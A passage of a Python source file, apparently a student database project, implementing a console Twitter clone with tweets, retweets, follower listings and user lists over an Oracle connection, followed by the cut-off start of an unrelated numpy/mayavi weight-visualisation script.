str(stats[2]) + \", \" + str(stats[3]).strip() + \", \" + str(stats[4]) + \", \" + str(stats[5]) + \", \" + str(stats[6]) + \")\")\n\tprint()\n\n\tinp = \"\"\n\twhile(True):\n\t\tinp = input(\"Type 'reply' to reply to the tweet, 'retweet' to retweet the tweet, \"\n\t\t\"or 'back' to return to the last screen: \")\n\t\tif inp != \"reply\" and inp != \"retweet\" and inp != \"back\":\n\t\t\tprint(\"Unrecoginzed input, please try again\")\n\t\telse:\n\t\t\tbreak\n\tif inp == \"reply\":\n\t\tdisplayComposeTweet(connection, user_id, tweet_id)\n\telif inp == \"retweet\":\n\t\tretweet(connection, user_id, tweet_id)\n\n# Returns the number of retweets and replies for the tweet\ndef getTweetStats(connection, tweet_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select tid, writer, tdate, text, replyto, (select nvl(count(*), 0) from tweets where replyto = :tid1) as num_tweets, \"\n\t\t\"(select nvl(count(*), 0) from retweets where tid = :tid2) as num_retweets from tweets where tid = :tid3\")\n\tcurs.execute(None, {'tid1':tweet_id, 'tid2':tweet_id, 'tid3':tweet_id})\n\trow = curs.fetchone()\n\tcurs.close()\n\treturn row\n\n# Return the followers that the selected user followed\ndef searchAllFollowers(connection, user_id):\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select flwer,flwee,start_date,name from follows, users \"\n\t\t\t\t\"where flwee = :usr and usr = flwer\")\n\tcurs.execute(None, {'usr':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n#returning to follwing status, that is, when you select a user, you can follow this user\n#each user can only be follwed by once.\n#once followed the user, the comman should be: \"successfully followed\"\ndef followUsers(connection,flwee,user_id):\n\t#user_id = searchAllFollowers(connection,user_id)\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from follows where (flwer = :flwer and flwee =:flwee)\")\n\tcurs.execute(None, {'flwer':user_id, 'flwee':flwee})\n\trows = curs.fetchall()\n\tif ( len(rows) > 0) :\n\t\tprint( \"you have already followed this user\")\n\telse :\n\t\tcurs.prepare(\"insert into follows values (:flwer, :flwee, :start_date)\")\n\t\tcurs.execute(None, {'flwer':user_id, 'flwee':flwee, 'start_date':time.strftime(\"%d-%b-%Y\")})\n\t\tprint(\"Successfully followed\")\n\tconnection.commit()\n\tcurs.close()\n\n#the list followers function. when typing in the termial\"search followers\", it should be a list of followers\n#that following the user you logged in. Once you select a follower,you can see informations about the user,\n#and also have the option to follow this user.\ndef displayAllFollowers(connection,user_id):\n\n\trows = searchAllFollowers(connection,user_id)\n\n\tif len(rows) > 0:\n\t\tprint(\"Followers list,please choose:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 5 Followers have been printed or we have reached the end of the users\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the followers\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 followers were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the follower, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the follower: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if only a single follower was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the follower, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the follower: \" % (i))\n\t\t\t\t\t\t# Either 2, 3, or 4 follower were printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the follower, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the follower: \" % ((i-(i%5)+1), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the follower\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" :\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more follower to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the follower, \"\n\t\t\t\t\t\t\"'more' to view the next 5 user, or 'skip' to skip viewing the follower: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the follower\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\t\t\t\t#elif inp == \"follow\":\n\t\t\t\t#\tfollowUsers(connection, rows[i-1][1],user_id)\n\t\t\t\t#\tbreak\n\t\t\t\t# A user was selected\n\t\t\t\telse:\n\t\t\t\t\tdisplayUserStats(connection, rows[int(inp)-1][0],user_id)\n\t\t\t\t\tindices = []\n\t\t\t\t\tif i%5 == 0:\n\t\t\t\t\t\ti = i-5\n\t\t\t\t\telse:\n\t\t\t\t\t\ti = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No Follower .\")\n\n# Gets the tweet text from the user for a new tweet\ndef displayComposeTweet(connection, user_id, replyto):\n\ttext = \"\"\n\thashtags = []\n\twhile(True):\n\t\ttext = input(\"Enter the text of your tweet: \")\n\t\ttextGood = True\n\t\thashtags = getHashtags(text)\n\t\tfor hashtag in hashtags:\n\t\t\tif len(hashtag) > 10:\n\t\t\t\tprint(\"Maximum length of a hashtag is 10 characters, please try again.\")\n\t\t\t\ttextGood = False\n\t\tif len(hashtags) > len(set(hashtags)):\n\t\t\tprint(\"You can only use a hashtag once in a single tweet, please try again.\")\n\t\t\ttextGood = False\n\t\tif len(text) > 80:\n\t\t\tprint(\"Maximum length of tweet text is 80 characters, please try again.\")\n\t\t\ttextGood = False\n\t\tif textGood:\n\t\t\tbreak\n\tcomposeTweet(connection, user_id, text, replyto, hashtags)\n\n# Creates a new tweet and adds the hashtags to the hashtag and mentions tables\ndef composeTweet(connection, user_id, text, replyto, hashtags):\n\t# Get a tweet id and check that it is unique\n\ttid = random.randrange(-2147483648, 2147483647) #-2^31 to (2^31)-1\n\twhile (True):\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"select * from tweets where tid = :tid\")\n\t\tcurs.execute(None, {'tid':tid})\n\t\tif curs.fetchone():\n\t\t\ttid = random.randrange(-2147483648, 2147483647)\n\t\telse:\n\t\t\tcurs.close()\n\t\t\tbreak\n\n\t# Insert the tweet into the tweets table\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into tweets values (:tid, :writer, :tdate, :text, :replyto)\")\n\tcurs.execute(None, {'tid':tid, 'writer':user_id, 'tdate':datetime.datetime.now(), 'text':text, 'replyto':replyto})\n\tconnection.commit()\n\tcurs.close()\n\n\t# Add the hashtags to the mentions and hashtag tables\n\tfor hashtag in hashtags:\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"select * from hashtags where trim(term) = :htag\")\n\t\tcurs.execute(None, {'htag':hashtag})\n\t\trow = curs.fetchone()\n\t\tif not (row):\n\t\t\t# This is a new hashtag to add it to the hashtag table\n\t\t\tcurs2 = connection.cursor()\n\t\t\tcurs2.prepare(\"insert into hashtags values (:term)\")\n\t\t\tcurs2.execute(None, {'term':hashtag})\n\t\t\tconnection.commit()\n\t\t\tcurs2.close()\n\t\tcurs.close()\n\n\t\t# Add the hashtag to the mentions table\n\t\tcurs = connection.cursor()\n\t\tcurs.prepare(\"insert into mentions values (:tid, :term)\")\n\t\tcurs.execute(None, {'tid':tid, 'term':hashtag})\n\t\tconnection.commit()\n\t\tcurs.close()\n\n\tprint(\"Successfully tweeted\")\n\n# Gets all the hashtags from a string\ndef getHashtags(str):\n\tstrs = str.split()\n\thashtags = []\n\tfor st in strs:\n\t\tif st[0] == '#' and len(st) > 1:\n\t\t\tif st[1:] not in hashtags:\n\t\t\t\thashtags.append(st[1:])\n\treturn hashtags\n\n# Creates a new retweet\ndef retweet(connection, user_id, tweet_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from retweets where tid = :tid and usr = :id\")\n\tcurs.execute(None, {'tid':tweet_id, 'id':user_id})\n\n\tif curs.fetchone():\n\t\tprint(\"You cannot retweet a tweet more than once.\")\n\t\tcurs.close()\n\t\treturn\n\tcurs.close()\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into retweets values (:id, :tid, :tdate)\")\n\tcurs.execute(None, {'id':user_id, 'tid':tweet_id, 'tdate':datetime.datetime.now()})\n\tcurs.close()\n\tconnection.commit()\n\tprint(\"Successfully retweeted.\")\n\n# return to users that you searched by the key word\ndef searchAllUsers(connection, inp):\n\n\tinp = '%' + inp + '%'\n\tcurs = connection.cursor()\n\n\tcurs.prepare(\"select * from (select name,usr,city from users where name like :keyName order by length(trim(name)) asc, length(trim(city)) asc ) \"\n\t\t\t\" union all select * from (select name,usr,city from users where city like :keyName and name not like :keyName \"\n\t\t\t\" order by length(trim(city)) asc,length(trim(name)) asc)\")\n\n\tcurs.execute(None, {'keyName':inp})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n#the search users function. after logged in, you should be able to search any users by a key word. Thsy are\n# listing by an ascending order. once you select a user, you can see any informations about the user. you can\n# also have the option to follow this user.\ndef displayAllUsers(connection,user_id):\n\tinp = input(\"Please input a keyword : \")\n\t#inp2 = input(\"Do you wanto to follow the user? \")\n\trows = searchAllUsers(connection, inp)\n\t#follow = followusers(connection, flwer)\n\tif len(rows) > 0:\n\t\tprint(\"users list,please choose:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 5 user have been printed or we have reached the end of the users\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the users\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 user were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the user, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the users: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if only a single user was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the user, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the users: \" % (i))\n\n\t\t\t\t\t\t# Either 2, 3, or 4 user were printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the user, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the users: \" % ((i-(i%5)+1), i))\n\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the user\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more user to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the user, \"\n\t\t\t\t\t\t\"'more' to view the next 5 user, or 'skip' to skip viewing the user: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the user\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\n\t\t\t\t# A user was selected\n\t\t\t\telse:\n\t\t\t\t\tdisplayUserStats(connection, rows[int(inp)-1][1],user_id)\n\t\t\t\t\tindices = []\n\t\t\t\t\tif i%5 == 0:\n\t\t\t\t\t\ti = i-5\n\t\t\t\t\telse:\n\t\t\t\t\t\ti = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No suit users .\")\n\n# return to the users status, like number of followers, number of folowing users, number of tweets\ndef getUserStats(connection, user_id):\n\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select b1.twnum,b2.fenum,b3.frnum from (select count(tid) twnum from tweets where writer =:user1 ) b1 ,\"\n\t\t\"(select count(flwer) fenum from follows where flwee = :user1 ) b2,\"\n\t\t\"(select count(flwee) frnum from follows where flwer = :user1 ) b3 \")\n\tcurs.execute(None, {'user1':user_id })\n\trow = curs.fetchone()\n\tcurs.close()\n\treturn row\n\n# return to the tweets ordered by recent updated\ndef getUserTweets(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select * from tweets where writer= :user1 order by tdate desc \")\n\tcurs.execute(None, {'user1':user_id })\n\trow = curs.fetchall()\n\tcurs.close()\n\treturn row\n\n#display the users users status, like number of followers, number of folowing users, number of 3 recent tweets\ndef displayUserStats(connection, user,user_id):\n\n\tstats = getUserStats(connection, user)\n\tprint(\"the number of tweets is \",stats[0],\" the number of users being followed is \",stats[2],\"the number of followers is \" ,stats[1])\n\trows = getUserTweets(connection,user)\n\tinp = \"\"\n\tif len(rows) > 0:\n\t\tprint(\"Recent Tweets:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 3 tweets have been printed or we have reached the end of the tweets\n\t\t\tif ((i%3) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the tweets/retweets\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\tinp = input(\"Type 'follow' to follow the user, or 'skip' to skip viewing the tweets: \")\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"follow\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\t\t# There are still more tweets to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type 'more' to view the next 3 tweets, 'follow' to follow \"\n\t\t\t\t\t\t\"the user, or 'skip' to skip viewing the user: \")\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\" or inp == \"follow\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\t\t\t\telif inp == \"follow\":\n\t\t\t\t\tfollowUsers(connection, user, user_id)\n\t\t\t\t\tbreak\n\t\t\ti = i + 1\n\n\telse:\n\t\tprint(\"No tweets.\")\n\n\t\twhile(True):\n\t\t\tinp = input(\"Type 'follow' to follow the user: or 'skip' to skip viewing the follower: \" )\n\t\t\tif inp == \"skip\":\n\t\t\t\tbreak\n\t\t\telif inp == \"follow\":\n\t\t\t\tfollowUsers(connection, user,user_id)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Prompt for managing lists\ndef displayManageLists(connection, user_id):\n\tinp = \"\"\n\twhile (True):\n\t\tinp = input(\"Type 'my lists' to view your lists, 'on lists' to view the lists you are on, 'create list' to create a new list, or 'back' to return to the last screen: \")\n\t\tif inp == \"my lists\":\n\t\t\tdisplayMyLists(connection, user_id)\n\t\telif inp == \"on lists\":\n\t\t\tdisplayOnLists(connection, user_id)\n\t\telif inp == \"create list\":\n\t\t\tdisplayCreateList(connection, user_id)\n\t\telif inp == \"back\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Displays all of the user's lists\ndef displayMyLists(connection, user_id):\n\tlists = getMyLists(connection, user_id)\n\n\ti = 1\n\tfor row in lists:\n\t\tprint(i, row[0])\n\t\ti = i + 1\n\n\tinp = \"\"\n\tif i > 1:\n\t\twhile (True):\n\t\t\tif i > 2:\n\t\t\t\tinp = input(\"Type numbers 1-%s to manage the list or 'back' to return to the last screen: \" % (i - 1))\n\t\t\telse:\n\t\t\t\tinp = input(\"Type number 1 to manage the list or 'back' to return to the last screen: \")\n\n\t\t\tif inp == \"back\":\n\t\t\t\tbreak\n\t\t\ttry:\n\t\t\t\tif int(inp) > 0 and int(inp) < i:\n\t\t\t\t\tdisplayList(connection, user_id, lists[int(inp) - 1][0])\n\t\t\t\t\t# reprint the lists\n\t\t\t\t\ti = 1\n\t\t\t\t\tfor row in lists:\n\t\t\t\t\t\tprint(i, row[0])\n\t\t\t\t\t\ti = i + 1\n\t\t\texcept:\n\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Returns all the lists that the user has\ndef getMyLists(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select lname from lists where owner = :owner\")\n\tcurs.execute(None, {'owner':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n# Displays the members of the list and gives the option to add or remove a member from the list\ndef displayList(connection, user_id, listName):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select member from includes where lname = :listName\")\n\tcurs.execute(None, {'listName':listName})\n\trows = curs.fetchall()\n\tcurs.close\n\n\tif len(rows) > 0:\n\t\tprint(\"List Members:\")\n\t\tfor row in rows:\n\t\t\tprint(row[0])\n\telse:\n\t\tprint(\"This list has no members.\")\n\n\tinp = \"\"\n\twhile (True):\n\t\tinp = input(\"Type 'add [member]' to add [member] to the list, 'remove [member]' to remove [member] from the list, or 'back' to return to the last screen: \")\n\t\tif inp == \"back\":\n\t\t\tbreak\n\t\telif len(inp) > 4 and inp[:4] == \"add \":\n\t\t\t# check that the member exists\n\t\t\ttry:\n\t\t\t\tmemberId = int(inp[4:])\n\t\t\t\tcurs = connection.cursor()\n\t\t\t\tcurs.prepare(\"select * from users where usr = :userId\")\n\t\t\t\tcurs.execute(None, {'userId':memberId})\n\t\t\t\trow1 = curs.fetchone()\n\t\t\t\tcurs.close()\n\n\t\t\t\tcurs = connection.cursor()\n\t\t\t\tcurs.prepare(\"select * from includes where lname = :listName and member = :member\")\n\t\t\t\tcurs.execute(None, {'listName':listName, 'member':memberId})\n\t\t\t\trow2 = curs.fetchone()\n\t\t\t\tcurs.close()\n\n\t\t\t\tif not row1:\n\t\t\t\t\tprint(\"The id entered does not correspond to a user, please try again.\")\n\t\t\t\telif row2:\n\t\t\t\t\tprint(\"The user is already included in the list, please try again.\")\n\t\t\t\telse:\n\t\t\t\t\taddMemberToList(connection, user_id, listName, memberId)\n\t\t\t\t\t# reprint the lists\n\t\t\t\t\tcurs = connection.cursor()\n\t\t\t\t\tcurs.prepare(\"select member from includes where lname = :listName\")\n\t\t\t\t\tcurs.execute(None, {'listName':listName})\n\t\t\t\t\trows = curs.fetchall()\n\t\t\t\t\tcurs.close()\n\n\t\t\t\t\tif len(rows) > 0:\n\t\t\t\t\t\tprint(\"List Members:\")\n\t\t\t\t\t\tfor row in rows:\n\t\t\t\t\t\t\tprint(row[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"This list has no members.\")\n\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Member to add must be a user id as a number, please try again.\")\n\n\t\telif len(inp) > 7 and inp [:7] == \"remove \":\n\t\t\t# check that the member is on the list\n\t\t\ttry:\n\t\t\t\tmemberId = int(inp[7:])\n\t\t\t\tcurs = connection.cursor()\n\t\t\t\tcurs.prepare(\"select * from includes where lname = :listName and member = :member\")\n\t\t\t\tcurs.execute(None, {'listName':listName, 'member':memberId})\n\t\t\t\trow = curs.fetchone()\n\t\t\t\tcurs.close()\n\t\t\t\tif not row:\n\t\t\t\t\tprint(\"The user id entered is not on the list, please try again.\")\n\t\t\t\telse:\n\t\t\t\t\tremoveMemberFromList(connection, user_id, listName, memberId)\n\t\t\t\t\t# reprint the lists\n\t\t\t\t\tcurs = connection.cursor()\n\t\t\t\t\tcurs.prepare(\"select member from includes where lname = :listName\")\n\t\t\t\t\tcurs.execute(None, {'listName':listName})\n\t\t\t\t\trows = curs.fetchall()\n\t\t\t\t\tcurs.close()\n\n\t\t\t\t\tif len(rows) > 0:\n\t\t\t\t\t\tprint(\"List Members:\")\n\t\t\t\t\t\tfor row in rows:\n\t\t\t\t\t\t\tprint(row[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"This list has no members\")\n\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Member to remove must be a user id as a number, please try again.\")\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n# Displays all the lists that the user is on\ndef displayOnLists(connection, user_id):\n\tlists = getOnLists(connection, user_id)\n\tif len(lists) == 0:\n\t\tprint(\"You are not on any lists.\")\n\tfor row in lists:\n\t\tprint(row)\n\n# Returns all the lists that a user is currently on\ndef getOnLists(connection, user_id):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"select l.lname, l.owner from lists l, includes i where l.lname = i.lname and i.member = :member\")\n\tcurs.execute(None, {'member':user_id})\n\trows = curs.fetchall()\n\tcurs.close()\n\treturn rows\n\n# Asks the user for the name of a new list to create and creates it\ndef displayCreateList(connection, user_id):\n\tlistName = \"\"\n\twhile (True):\n\t\tlistName = input(\"Type the name of the new list: \")\n\t\tif len(listName) > 12:\n\t\t\tprint(\"Maximum length of list name is 12 characters, please try again.\")\n\t\telse:\n\t\t\t# Check that this name has not already been used\n\t\t\tcurs = connection.cursor()\n\t\t\tcurs.prepare(\"select * from lists where trim(lname) = :listName\")\n\t\t\tcurs.execute(None, {'listName':listName})\n\t\t\trow = curs.fetchone()\n\t\t\tif row:\n\t\t\t\tprint(\"List name is already in use, please try another name.\")\n\t\t\t\tcurs.close()\n\t\t\telse:\n\t\t\t\tcurs.close()\n\t\t\t\tbreak\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into lists values (:listName, :owner)\")\n\tcurs.execute(None, {'listName':listName, 'owner':user_id})\n\tconnection.commit()\n\tcurs.close()\n\tprint(\"Successfully created a new list.\")\n\n# Adds a new member to an existing list\ndef addMemberToList(connection, user_id, listName, member):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"insert into includes values (:listName, :member)\")\n\tcurs.execute(None, {'listName':listName, 'member':member})\n\tconnection.commit()\n\tcurs.close()\n\tprint(\"Successfully added member to list.\")\n\n# Removes a member from an existing list\ndef removeMemberFromList(connection, user_id, listName, member):\n\tcurs = connection.cursor()\n\tcurs.prepare(\"delete from includes where member = :member\")\n\tcurs.execute(None, {'member':member})\n\tconnection.commit()\n\tcurs.close()\n\tprint(\"Successfully removed member from list.\")\n# Search for tweets. The user should be able to enter one or more keywords and the system should retrieve every tweet that match at least one of the keywords. The tweets should be ordered based on date from the latest to the oldest.\ndef search(connection, inp):\n while True:\n if len(inp)==0:\n print(\"Empty keyword, try again!\")\n else:\n list= inp.split()\n break\n for item in list:\n item = item.strip()\n result=[]\n for item in list:\n newitem = \"%\"+\"#\"+item+\"%\"\n item = \"%\" + item + \"%\"\n curs = connection.cursor()\n curs.prepare(\"select * from tweets where text like : item order by tdate desc\")\n #curs.prepare(\"select * from (select * from tweets where text like : item order by tdate desc)\"\n\t #\"union all select * from (select * from tweets where text like: newitem order by tdate desc)\")\n #curs.execute(None,{'item': item,'newitem': newitem})\n curs.execute(None,{'item': item})\n rows=curs.fetchall()\n for row in rows:\n result.append(row)\n\n curs.close()\n return result\n\n# If there are more than 5 matching tweets, only 5 would be shown and the user would be given an option to see more but again 5 at a time. The user should be able to select a tweet and see some statistics about the tweet including the number of retweets and the number of replies. Also the user should be able to compose a reply to a tweet (see the section on composing a tweet), or retweet it (i.e. repost it to all people who follow the user).\ndef displayAllTweets(connection):\n\tinp = input(\"Please input keyword: \")\n\trows = search(connection, inp)\n\tif len(rows) > 0:\n\t\tprint(\"tweets list,please choose:\")\n\t\ti = 1\n\t\tindices = []\n\t\twhile (True):\n\t\t\tindices.append(i)\n\t\t\tprint(i, rows[i-1])\n\n\t\t\t# Either 5 tweets have been printed or we have reached the end of the tweets\n\t\t\tif ((i%5) == 0) or (len(rows) == i):\n\t\t\t\tinp = \"\"\n\n\t\t\t\twhile (True):\n\t\t\t\t\t# Check if we have reached the end of the tweets\n\t\t\t\t\tif len(rows) == i:\n\t\t\t\t\t\t# Check if a full 5 tweets were printed\n\t\t\t\t\t\tif (i%5) == 0:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweets, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\n\t\t\t\t\t\t# Check if only a single tweet was printed\n\t\t\t\t\t\telif (i%5) == 1:\n\t\t\t\t\t\t\tinp = input(\"Type number %s to view more information about the tweets, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % (i))\n\n\t\t\t\t\t\t# Either 2, 3, or 4 tweet was printed\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweets, \"\n\t\t\t\t\t\t\t\"or 'skip' to skip viewing the tweets: \" % ((i-(i%5)+1), i))\n\n\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweet\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\t\t\t\t\t# There are still more tweets to display so offer to display the next ones aswell\n\t\t\t\t\telse:\n\t\t\t\t\t\tinp = input(\"Type numbers %s-%s to view more information about the tweets, \"\n\t\t\t\t\t\t\"'more' to view the next 5 tweets, or 'skip' to skip viewing the tweets: \" % ((i-4), i))\n\t\t\t\t\t\t# Check if the input is an int representing 1 of the tweet\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif int(inp) in indices:\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif inp == \"skip\" or inp == \"more\":\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(\"Unrecognized input, please try again.\")\n\t\t\t\tif inp == \"skip\":\n\t\t\t\t\tbreak\n\t\t\t\telif inp == \"more\":\n\t\t\t\t\tindices = []\n\n\t\t\t\t# A tweet was selected\n\t\t\t\telse:\n\t\t\t\t\t\n displayTweetStats(connection, rows[int(inp)-1][1], rows[int(inp)-1][0])\n\n\n indices = []\n if i%5 == 0:\n i = i-5\n else:\n i = i - (i%5)\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"No suit tweets .\")\n\ndef main():\n\tconnection = getConnection()\n\n\t# Let the user login or create an account\n\tret = displayLoginOrCreate(connection)\n\tcreatedAccount = ret[0]\n\tuser_id = ret[1]\n\n\t# There was not a new account created so show the tweets and retweets\n\tif not createdAccount:\n\t\tdisplayTweetsAndRetweets(connection, user_id)\n\n\t# MENU\n\twhile (True):\n\t\tinp = input(\"Type 'search tweets' to search tweets, 'search users' to search users, 'compose tweet' to write a tweet, 'list followers' to list your followers, 'manage lists' to see lists, or 'logout' to logout: \")\n\n\t\tif inp == \"search tweets\":\n\t\t\tdisplayAllTweets(connection)\n\n\t\telif inp == \"search users\":\n\t\t\tdisplayAllUsers(connection, user_id)\n\n\t\telif inp == \"compose tweet\":\n\t\t\tdisplayComposeTweet(connection, user_id, None)\n\n\t\telif inp == \"list followers\":\n\t\t\tdisplayAllFollowers(connection,user_id)\n\n\t\telif inp == \"manage lists\":\n\t\t\tdisplayManageLists(connection, user_id)\n\n\t\telif inp == \"logout\":\n\t\t\tbreak\n\n\t\telse:\n\t\t\tprint(\"Unrecognized input, please try again.\")\n\n\tconnection.commit()\n\tconnection.close()\n\nif __name__ == \"__main__\":\n main()","sub_path":"Project1/miniProject1master.py","file_name":"miniProject1master.py","file_ext":"py","file_size_in_byte":32767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607411979","text":"#!/usr/bin/env python\n\nimport numpy as np\nfrom mayavi import mlab\nimport json\n\n\nwith open('../src/params.json') as data_file: \n params = json.load(data_file)\n\n# conv2\nw = np.loadtxt('weights_conv2.txt')\nw = w.reshape((params['layers'][3]['map_num'], params['layers'][1]['map_num'], params['layers'][3]['win_len'], 